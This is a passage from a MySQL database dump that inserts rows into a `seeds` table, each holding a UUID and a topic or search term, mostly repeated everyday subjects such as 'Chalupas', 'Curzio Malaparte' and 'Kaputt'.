mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n--\n-- Dumping data for table `seeds`\n--\n\nINSERT INTO `seeds` (`uuid`, `seed`, `seedsource`) VALUES\n('29d47ca0-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('776fabba-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c76e7e34-ddf5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f1695e84-ddf5-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('952698de-ddf6-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('3260b1a2-ddf7-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('4bee0090-de9f-11e2-acfa-12313d015d04', 'Deimos', ''),\n('a123b32a-de9f-11e2-acfa-12313d015d04', 'Deimos', ''),\n('4d370766-dea0-11e2-acfa-12313d015d04', 'Phobos', ''),\n('d4ee4782-dea0-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('666d01da-dea1-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e32256de-dea2-11e2-acfa-12313d015d04', 'Edward Snowden', ''),\n('338747be-dea4-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', 
''),\n('a552f044-debf-11e2-acfa-12313d015d04', 'no', ''),\n('c4b30fe6-debf-11e2-acfa-12313d015d04', 'PT boat', ''),\n('86f74260-dec1-11e2-acfa-12313d015d04', 'PT boat', ''),\n('74edbbc8-df46-11e2-acfa-12313d015d04', 'PT boat', ''),\n('8e61470a-df50-11e2-acfa-12313d015d04', 'PT boat', ''),\n('46d0eaae-e5a3-11e2-acfa-12313d015d04', 'Castles', ''),\n('af5f30de-e5a4-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3baa1888-e5a5-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c188ef56-e5a5-11e2-acfa-12313d015d04', 'Castle', ''),\n('a10a5002-e5a6-11e2-acfa-12313d015d04', 'Iain M. Banks', ''),\n('d4532488-e5a7-11e2-acfa-12313d015d04', 'Iain M. Banks', ''),\n('24073db0-e5a9-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('5aa1b9c2-e5a9-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('b5871dae-e5aa-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('da417572-e5aa-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('a6db2178-e5ab-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('9dc819f0-e5ac-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('0f6cad5a-e5ad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('726733e4-e5ad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('2135d632-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5ab07656-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a8f5d900-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e1190622-e5ae-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('152393f6-e5af-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6c8d7fda-e5af-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('e281f432-e5af-11e2-acfa-12313d015d04', 'Dean McLaughlin', ''),\n('805e1682-e73f-11e2-acfa-12313d015d04', 'Legend of Korra', ''),\n('6078977e-e740-11e2-acfa-12313d015d04', 'Legend of Korra', ''),\n('8da80caa-e742-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', ''),\n('72202598-e743-11e2-acfa-12313d015d04', 'Motor Torpedo Boat', ''),\n('82f9f72c-e743-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('532fd2c2-e744-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('11b8c51e-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2dc0db98-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('66753a56-e745-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('b6fa6730-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c75dd602-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f61d509e-e745-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1f92adb6-e746-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2ced5868-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('ad46348a-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('cb165c7e-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('da7cc3ce-e74a-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('25116d2c-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('45e90d0c-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6aa92b36-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a7f210ca-e74b-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('413abbf6-e74c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('63da952c-e74d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('bbe8a326-e74d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('35b1c934-e74f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('677d71ac-e74f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('36786b72-e75c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('85e12474-e75c-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('516f92b0-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('7c0951e6-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('949ef468-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e0d4707e-e75d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f2a26bb2-e75d-11e2-acfa-12313d015d04', 
'Chalupas', ''),\n('4e576430-e75e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('004616c8-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1a7ab512-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('536006a2-e75f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1c85f7e4-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6458c5f6-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c8d99136-e760-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('00eee8b8-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('1544f53c-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('bb98ba04-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('d68b214e-e762-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('62f6923a-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('8ea13aca-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('af4a4e74-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('cb02ea2c-e763-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('306e6fea-e76d-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('59578530-e76e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c76c8ef8-e76e-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3446167a-e76f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f20f3af6-e76f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('01da5796-e7e2-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5a3e8c58-e7e3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c157b2a2-e7e3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('f45c2b6e-e7e4-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('aad83d80-e806-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('6613f8a4-e808-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('e64c9366-e80b-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('8116d7c0-e8c6-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('ea3d2af0-e8c7-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('831d832c-e8c9-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('aa2c760c-e8ca-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('d824913e-e8ca-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('d4361128-e8cb-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('51955596-e8d3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('93ce3874-e8d3-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('4dbc5efe-e8ee-11e2-acfa-12313d015d04', 'curzio malaparte', ''),\n('18a29132-e8f0-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('1e495034-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('8166a00e-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('c1b3736c-e8f1-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('10441c50-e8f4-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('e02d25ec-e98f-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('37ead504-e990-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('5f70a090-e990-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('0abedb60-e991-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('32682aac-e993-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('c3568bd0-e993-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('37eb59d6-e9bb-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('582f2d4e-e9bb-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('28023588-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('617fef80-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('756cedf4-e9bd-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('e6556dde-e9c2-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('3539c0bc-e9c3-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('51059fd8-ea67-11e2-acfa-12313d015d04', 'Curzio Malaparte', ''),\n('65208fe6-ea67-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('0ad42114-ea68-11e2-acfa-12313d015d04', 'Mulberry', ''),\n('25d2608e-ea68-11e2-acfa-12313d015d04', 'Mulberry', 
''),\n('f8aaf750-ea68-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('2ffdbc60-ea69-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('732e7c7c-ea69-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('a8934476-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('acbf78da-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('be8932fe-eb1b-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('038f019e-eb1c-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('95f1f8c0-eb1c-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('cb85479c-eb1e-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('47c777f8-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('7e79d638-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('a0fa3374-eb1f-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('6a71f1dc-eb21-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('14edcdc4-eb23-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('e4e14ab0-eb23-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('0cdf61be-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('aaefebf8-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('cdb89a72-eb24-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('d56e337e-eb26-11e2-acfa-12313d015d04', 'Apprendistato', ''),\n('ce5aaf04-ec20-11e2-acfa-12313d015d04', 'Tactics', ''),\n('39f4146e-edaa-11e2-b163-12313d015d04', 'Chalupas', ''),\n('47e2725a-edaa-11e2-9315-12313d015d04', 'Chalupas', ''),\n('d0b171bc-edaa-11e2-a0cf-12313d015d04', 'Chalupas', ''),\n('6ae12da2-edad-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('7553e46e-edad-11e2-acfa-12313d015d04', 'Butterfly', ''),\n('8ec912fc-edad-11e2-acfa-12313d015d04', 'Chalupas', ''),\n('8129aebc-edae-11e2-a744-12313d015d04', 'Chalupas', ''),\n('897f52a6-edae-11e2-99f4-12313d015d04', 'Chalupas', ''),\n('813f750e-edbc-11e2-a90b-12313d015d04', 'Chalupas', ''),\n('b3b22c0c-edbc-11e2-b926-12313d015d04', 'Legge', ''),\n('5ec0aca0-ee70-11e2-b711-12313d015d04', 'Cicco Produttivo', ''),\n('8a21abba-ee70-11e2-8df6-12313d015d04', 'Conciliazone', ''),\n('c451a9a2-ee70-11e2-ace7-12313d015d04', 'Conciliazione', ''),\n('6bfa3bda-ee74-11e2-ab35-12313d015d04', 'Conciliazione', ''),\n('82e56efa-ef14-11e2-8ecb-12313d015d04', 'Chalupas', ''),\n('c087d3aa-ef15-11e2-90d2-12313d015d04', 'Kaputt', ''),\n('2b26529a-ef16-11e2-a2c6-12313d015d04', 'Kaputt', ''),\n('b394c1d4-ef16-11e2-9937-12313d015d04', 'Curzio Malaparte', ''),\n('f6e5d78e-ef16-11e2-8d09-12313d015d04', 'Curzio Malaparte', ''),\n('1f446178-ef17-11e2-833f-12313d015d04', 'Curzio Malaparte', ''),\n('75302e6a-ef3e-11e2-994c-12313d015d04', 'Deimos', ''),\n('ba110242-ef44-11e2-a083-12313d015d04', 'Deimos', ''),\n('c526d6b6-ef44-11e2-a091-12313d015d04', 'Chalupas', ''),\n('19dcee24-efe1-11e2-94df-12313d015d04', 'Kaputt', ''),\n('539454ae-efe1-11e2-a5a2-12313d015d04', 'Kaputt', ''),\n('1e1a114a-efe3-11e2-b41a-12313d015d04', 'Kaputt', ''),\n('768cf3da-f09f-11e2-acfa-12313d015d04', 'Diels-Alder reaction', ''),\n('eb760c5c-f0a1-11e2-a41f-12313d015d04', 'Kaputt', ''),\n('0627c0d8-f0a5-11e2-8b4b-12313d015d04', 'Kaputt', ''),\n('0c2b1002-f0a5-11e2-9c3d-12313d015d04', 'Kaputt', ''),\n('8780cc92-f0a5-11e2-aade-12313d015d04', 'Kaputt', ''),\n('a953bbae-f0a5-11e2-a538-12313d015d04', 'Kaputt', ''),\n('24496ecc-f0aa-11e2-b1c0-12313d015d04', 'Kaputt', ''),\n('476fca4c-f0cb-11e2-b4d2-12313d015d04', 'Kaputt', ''),\n('7fd662aa-f0cc-11e2-b39a-12313d015d04', 'Kaputt', ''),\n('3572ea8e-f0cd-11e2-bc22-12313d015d04', 'Kaputt', ''),\n('da923560-f0cd-11e2-bdd6-12313d015d04', 'Kaputt', ''),\n('8d977efa-f0d2-11e2-940f-12313d015d04', 'Kaputt', 
''),\n('cc576326-f0d2-11e2-a3f9-12313d015d04', 'Kaputt', ''),\n('5a6ef564-f0d5-11e2-b002-12313d015d04', 'Chalupas', ''),\n('530b4edc-f0d8-11e2-9af3-12313d015d04', 'Chalupas', ''),\n('8407289e-f0d8-11e2-9c80-12313d015d04', 'Chalupas', ''),\n('6b6e419a-f0d9-11e2-a112-12313d015d04', 'Chalupas', ''),\n('22b3dacc-f0da-11e2-9925-12313d015d04', 'Chalupas', ''),\n('ee27c1d2-f189-11e2-a7bc-12313d015d04', 'Diels-Alder Reaction', ''),\n('5fe4763a-f94b-11e2-8d42-12313d015d04', 'Methane', ''),\n('4532900c-f94f-11e2-8de4-12313d015d04', 'Methane', ''),\n('93691154-f951-11e2-99e1-12313d015d04', 'Sciamachy', ''),\n('0e40064c-fafd-11e2-9bb9-12313d015d04', 'Seney', ''),\n('124cc3ac-fb01-11e2-8df3-12313d015d04', 'Seney', ''),\n('57e01e48-fb09-11e2-81a0-12313d015d04', 'Seney', ''),\n('0f1e81d0-fb0a-11e2-8aa1-12313d015d04', 'Seney', ''),\n('6b6aaf68-fb0a-11e2-921b-12313d015d04', 'Seney', ''),\n('8485be10-fb0b-11e2-84c5-12313d015d04', 'Seney', ''),\n('921eab68-fb0b-11e2-83e2-12313d015d04', 'Seney', ''),\n('e0d5f982-fb0b-11e2-a6fb-12313d015d04', 'Seney', ''),\n('96637e5c-0131-11e3-9af4-12313d015d04', 'chalupa', ''),\n('ad0f2662-0206-11e3-949c-12313d015d04', 'optical rectifier', ''),\n('b406dbfe-0206-11e3-9dc0-12313d015d04', 'Seney', ''),\n('eb89ab42-0206-11e3-aef5-12313d015d04', 'Chalupas', ''),\n('b674730e-0208-11e3-9ad9-12313d015d04', 'no', ''),\n('e8af38f4-0208-11e3-96cc-12313d015d04', 'no', ''),\n('b2136b6a-020a-11e3-a5aa-12313d015d04', 'no', ''),\n('d073396e-020a-11e3-88a2-12313d015d04', 'no', ''),\n('3521b690-020d-11e3-83e2-12313d015d04', 'Chalupas', ''),\n('91e67536-020e-11e3-b7b4-12313d015d04', 'Quora', ''),\n('90e3233e-0211-11e3-bf0a-12313d015d04', 'climate engineering', ''),\n('db70e972-02cf-11e3-beae-12313d015d04', 'climate engineering', ''),\n('447aa7c2-02d1-11e3-96f1-12313d015d04', 'Advise & Consent', ''),\n('4dc81cb2-02d9-11e3-b25e-12313d015d04', 'Chalpuas', ''),\n('f41c6cdc-02e6-11e3-acfa-12313d015d04', 'efflorescence', ''),\n('610cbc6e-0424-11e3-8b1b-12313d015d04', 'efflorescence', ''),\n('53d9afd6-0431-11e3-acc8-12313d16658b', 'efflorescence', ''),\n('adf6eda2-046e-11e3-8be4-12313d16658b', 'chalupas', ''),\n('a66eda1c-046f-11e3-a7e0-12313d16658b', 'chalupas', ''),\n('df7eb4d4-0470-11e3-a4f1-12313d16658b', 'chalupas', ''),\n('c921d6f2-0471-11e3-b5eb-12313d16658b', 'crontab', ''),\n('e9957042-0471-11e3-8944-12313d16658b', 'Wyoming', ''),\n('fd922934-0474-11e3-b26a-12313d16658b', 'Nook', ''),\n('3bb93e1c-0477-11e3-9f8d-12313d16658b', 'chalupas', ''),\n('ed313c66-0513-11e3-84b4-12313d16658b', 'KISS', ''),\n('8e84d70c-0524-11e3-98cb-12313d16658b', 'ChromeCast', ''),\n('5c85ba2e-0541-11e3-a312-12313d16658b', 'NCIS LA', ''),\n('67d6a754-059f-11e3-bcf9-12313d16658b', 'Information integration', ''),\n('4d3096f0-05de-11e3-8daf-12313d16658b', 'LexisNexis', ''),\n('add587b4-05e2-11e3-89c3-12313d16658b', 'Information Integration', ''),\n('b0559618-06dd-11e3-9fcf-12313d16658b', 'Kim Kardashian', ''),\n('70d6714a-0c07-11e3-a01a-12313d16658b', 'chalupas', ''),\n('0839b470-0c08-11e3-b372-12313d16658b', 'Territory', ''),\n('a5912a8e-0c24-11e3-96f8-12313d16658b', 'Seleucid', ''),\n('ad59ef8e-0c2a-11e3-83b5-12313d16658b', 'Calibre', ''),\n('b5991f0c-0ce9-11e3-ae28-12313d16658b', 'Clusium', ''),\n('3c3632a2-0db7-11e3-84cd-12313d16658b', 'Clusium', ''),\n('f191c688-0de0-11e3-8ade-12313d16658b', 'Maccabees', ''),\n('75e912b4-0e69-11e3-a756-12313d16658b', 'C3 plants', ''),\n('657cc790-0e73-11e3-8912-12313d16658b', 'CAM photosynthesis', ''),\n('ae7b530e-0e77-11e3-a710-12313d16658b', 'Chalupas', 
''),\n('13fc1f5e-0e7a-11e3-b56c-12313d16658b', 'CAM photosynthesis', ''),\n('6c978d88-0e7a-11e3-a642-12313d16658b', 'Chalupas', ''),\n('d6c1cd72-0e7a-11e3-8991-12313d16658b', 'C4 plant', ''),\n('b8caf7d4-0e7b-11e3-91b7-12313d16658b', 'Torpedo Boat', ''),\n('061586c6-0e7c-11e3-b63f-12313d16658b', 'Julian Assange', ''),\n('58923d90-0e7c-11e3-b1f3-12313d16658b', 'Bradley Manning', ''),\n('c40c030c-0e7d-11e3-b1a8-12313d16658b', 'Calvary Chapel', ''),\n('0677a448-0e7f-11e3-8290-12313d16658b', 'Steve Ballmer', ''),\n('79acfd98-0e82-11e3-823e-12313d16658b', 'Boris Johnson', ''),\n('d2b08eb8-0e83-11e3-89e2-12313d16658b', 'Magento', ''),\n('9eaf03a0-0e84-11e3-acfa-12313d16658b', 'Benny Hill', ''),\n('b2090778-0e86-11e3-8b78-12313d16658b', 'Calais', ''),\n('b6c40d3a-0e86-11e3-94a0-12313d16658b', 'Chalupas', ''),\n('e3e7dd4a-0e87-11e3-8496-12313d16658b', 'Paula Patton', ''),\n('9ddd65fe-0f45-11e3-8c03-12313d16658b', 'Robots', ''),\n('e2e23ff8-14a9-11e3-92e5-12313d16658b', 'red line', ''),\n('6bebd944-14aa-11e3-8a0a-12313d16658b', 'prophet Agabus', ''),\n('ca5d05fc-14aa-11e3-ad2a-12313d16658b', 'Agabus', ''),\n('b54288b2-14b0-11e3-b1be-12313d16658b', 'red line', ''),\n('8d4c1a62-14c9-11e3-9e42-12313d16658b', 'low carbon', ''),\n('a15374b8-14fd-11e3-b116-12313d16658b', 'chalupas', ''),\n('0294d38e-14fe-11e3-acf3-12313d16658b', 'endymion', ''),\n('20cd8814-1562-11e3-a9b7-12313d16658b', 'water security', ''),\n('d186ee2e-1563-11e3-9940-12313d16658b', 'text analytics', ''),\n('a30e584c-1564-11e3-ad8c-12313d16658b', 'Syrian Liberation Army', ''),\n('84e5ba7e-1567-11e3-9c02-12313d16658b', 'Steve Ballmer', ''),\n('b29f4e48-156d-11e3-8858-12313d16658b', 'Steven A. Ross', ''),\n('527b6974-156e-11e3-b6e9-12313d16658b', 'Bar Mitzvah', ''),\n('94528e4c-1571-11e3-938e-12313d16658b', 'Bat Mitzvah', ''),\n('e3873950-1575-11e3-9dd4-12313d16658b', 'Der Spiegel', ''),\n('2540315a-1579-11e3-8fd8-12313d16658b', 'sarin', ''),\n('6c0f96e8-1579-11e3-8659-12313d16658b', 'Howard Dean', ''),\n('d00753f6-157a-11e3-a950-12313d16658b', 'combinatorics', ''),\n('294c743c-157b-11e3-a212-12313d16658b', 'Bionic Woman', ''),\n('c090c1a2-157d-11e3-a31b-12313d16658b', 'Matrix Algebra', ''),\n('1d898696-157e-11e3-b1c5-12313d16658b', 'Quora', ''),\n('80261bb6-157e-11e3-abb1-12313d16658b', 'chalupas', ''),\n('730d28ec-157f-11e3-bc99-12313d16658b', 'Tuvalu', ''),\n('a8800602-157f-11e3-b158-12313d16658b', 'chalupas', ''),\n('fc3dac88-1582-11e3-bd23-12313d16658b', 'Black Swan', ''),\n('6ee8e7b4-1585-11e3-93cc-12313d16658b', 'Patrician', ''),\n('b86bf542-1586-11e3-8488-12313d16658b', 'Red Dawn', ''),\n('ab191720-1587-11e3-8b07-12313d16658b', 'Edward Snowden', ''),\n('d6ad394e-15a4-11e3-84a9-12313d16658b', 'Old Navy', ''),\n('5c30595e-15cb-11e3-8655-12313d16658b', 'Seleucid', ''),\n('75c15dbe-15cb-11e3-9bab-12313d16658b', 'Seleucid', ''),\n('e2625f62-15cc-11e3-8a6a-12313d16658b', 'Chalupas', ''),\n('5bb8453e-15cd-11e3-bef3-12313d16658b', 'chalupas', ''),\n('1cc64aa0-162d-11e3-ad59-12313d16658b', 'Neville Chamberlain', ''),\n('5b5df91a-162e-11e3-a740-12313d16658b', 'Neville Chamberlain', ''),\n('525aa920-162f-11e3-84da-12313d16658b', 'Arxiv', ''),\n('1cacba60-1630-11e3-a023-12313d16658b', 'Chalupas', ''),\n('4317d91e-1630-11e3-aa66-12313d16658b', 'Duct tape', ''),\n('bf72deac-1633-11e3-ba6a-12313d16658b', 'Anthony Weiner', ''),\n('5bf56ffa-1635-11e3-a816-12313d16658b', 'Geoengineering', ''),\n('121e682c-1636-11e3-b1fc-12313d16658b', 'Sunflower', ''),\n('223f3488-1637-11e3-855e-12313d16658b', 'AFRICOM', 
''),\n('d286e5ac-1637-11e3-89ac-12313d16658b', 'AFRICOM', ''),\n('e251dba8-1638-11e3-b177-12313d16658b', 'Jamie Oliver', ''),\n('2bf9df0c-163a-11e3-860d-12313d16658b', 'Samantha Power', ''),\n('d5614634-163a-11e3-a917-12313d16658b', 'Neville Chamberlain', ''),\n('3f5be490-163b-11e3-9d57-12313d16658b', 'chalupas', ''),\n('ac2c1080-163c-11e3-a017-12313d16658b', 'Glutamate', ''),\n('3e139486-1652-11e3-8773-12313d16658b', 'Arctic Fox', ''),\n('8776000a-1652-11e3-9b97-12313d16658b', 'chalupas', ''),\n('9d885784-1653-11e3-82f9-12313d16658b', 'chalupas', ''),\n('01b10e40-1654-11e3-b7af-12313d16658b', 'chalupas', ''),\n('415323e4-1654-11e3-9fc2-12313d16658b', 'Arctic Fox', ''),\n('377e725a-1655-11e3-bf12-12313d16658b', 'Arctic Fox', ''),\n('503b0068-1657-11e3-9da4-12313d16658b', 'Chalupas', ''),\n('df5c1480-1657-11e3-9b5f-12313d16658b', 'Chalupas', ''),\n('447a6446-165a-11e3-90be-12313d16658b', 'Maersk Line', ''),\n('7181187e-168f-11e3-bd25-12313d16658b', 'GCHQ', ''),\n('30ce583e-1719-11e3-b78f-12313d16658b', 'diritto canonico', ''),\n('46f7094e-1719-11e3-9843-12313d16658b', 'diritto canonico', ''),\n('5ccb4b4a-1719-11e3-868d-12313d16658b', 'canonico', ''),\n('8aee4b76-1719-11e3-aaa1-12313d16658b', 'canonico', ''),\n('37826cd2-171a-11e3-a056-12313d16658b', 'diritto canonico', ''),\n('0339d360-1734-11e3-ba29-12313d16658b', 'diritto canonico', ''),\n('7bab5da0-1734-11e3-b4c2-12313d16658b', 'diritto canonico', ''),\n('cfccb490-1975-11e3-ae48-12313d16658b', 'विशिष्ट आपेक्षिकता सिद्धांत', ''),\n('17085cd2-1977-11e3-be70-12313d16658b', 'गैलीलियो गैलिली', ''),\n('25d19378-1977-11e3-885c-12313d16658b', '........ ......', ''),\n('4f658d3e-1a17-11e3-9175-12313d16658b', 'Checkmate', ''),\n('b60d6b2c-1a6e-11e3-a5e9-12313d16658b', 'battle of harlaw', ''),\n('116afd58-1a70-11e3-b063-12313d16658b', 'Adler', ''),\n('65e8e300-1b0a-11e3-9080-12313d16658b', 'Flight 93', ''),\n('73c0760e-1b0b-11e3-ad38-12313d16658b', 'chalupas', ''),\n('49d7b568-1b0c-11e3-ab8a-12313d16658b', 'Deimos', ''),\n('00b35b34-1b0d-11e3-b97d-12313d16658b', 'Deimos', ''),\n('427403ca-1b0d-11e3-8923-12313d16658b', 'Chalupas', ''),\n('79ad0a08-1b0d-11e3-9c59-12313d16658b', 'Deimos', ''),\n('b33ee154-1b14-11e3-9cda-12313d16658b', 'Algorithm', ''),\n('bf3a56b8-1b15-11e3-bdd2-12313d16658b', 'Chalupas', ''),\n('b4559a4a-1b16-11e3-9bf4-12313d16658b', 'Chalupas', ''),\n('ff8b5e90-1b17-11e3-8179-12313d16658b', 'Dublin Core', ''),\n('0a15d560-1b19-11e3-bae6-12313d16658b', 'Dublin Core', ''),\n('5eb9b0aa-1b1e-11e3-b39a-12313d16658b', 'Dublin Core', ''),\n('8827481c-1b1e-11e3-9013-12313d16658b', 'Dublin Core', ''),\n('9c4a4ac6-1b3f-11e3-9178-12313d16658b', 'Vulpes', ''),\n('07decd90-1bc0-11e3-8fcb-12313d16658b', 'Vladimir Putin', ''),\n('9bf73c0e-1bc2-11e3-a932-12313d16658b', 'Vyazma', ''),\n('635500d8-1bc3-11e3-aaeb-12313d16658b', 'Newt Scamander', ''),\n('97bdf634-1bc5-11e3-8c56-12313d16658b', 'Fantastic Beasts', ''),\n('f32c58d2-1be6-11e3-ae92-12313d16658b', 'Rinaldo e Armida', ''),\n('997d36d4-1be7-11e3-b475-12313d16658b', 'Rinaldo', ''),\n('6791b932-1be8-11e3-9e05-12313d16658b', 'Rinaldo', ''),\n('51bcec7a-1be9-11e3-911a-12313d16658b', 'Vermeer Malkunst', ''),\n('57a47b58-1be9-11e3-b989-12313d16658b', 'Rinaldo', ''),\n('68151d1c-1be9-11e3-8934-12313d16658b', 'Vermeer Malkunst', ''),\n('76b8391c-1be9-11e3-b002-12313d16658b', 'Malkunst', ''),\n('ee0c06a2-1c3d-11e3-b33f-12313d16658b', 'BLfBRJMTeAiESQBYjM', ''),\n('d024839e-216a-11e3-bb93-12313d16658b', 'how to gain traffic on a blog', ''),\n('a99e8eba-2221-11e3-9441-12313d16658b', 'blog traffic', 
''),\n('f7867468-2239-11e3-a757-12313d16658b', 'Dogfooding', ''),\n('d7a04c0a-226b-11e3-b594-12313d16658b', 'HgJrzLuR', ''),\n('5e49c96a-23e4-11e3-a255-12313d16658b', 'diy superannuation', ''),\n('4bbbf35a-2492-11e3-81ea-12313d16658b', 'Ignatz', ''),\n('f095ff5c-24af-11e3-94e5-12313d16658b', 'diy superannuation', ''),\n('f8359498-24af-11e3-a6d8-12313d16658b', 'superannuation', ''),\n('c9fdbd34-253c-11e3-a605-12313d16658b', 'Younger Dryas', ''),\n('593fcd2c-260d-11e3-acc9-12313d16658b', 'Unified messaging communications', ''),\n('dab602ae-260d-11e3-9109-12313d16658b', 'Unified messaging communications', ''),\n('e002852a-260d-11e3-a267-12313d16658b', 'Unified messaging', ''),\n('bf2fa53c-2610-11e3-8726-12313d16658b', 'Dogfooding', ''),\n('c5fde37e-2610-11e3-bdc6-12313d16658b', 'HgJrzLuR', ''),\n('d744c3f0-2610-11e3-a337-12313d16658b', 'Younger Dryas', 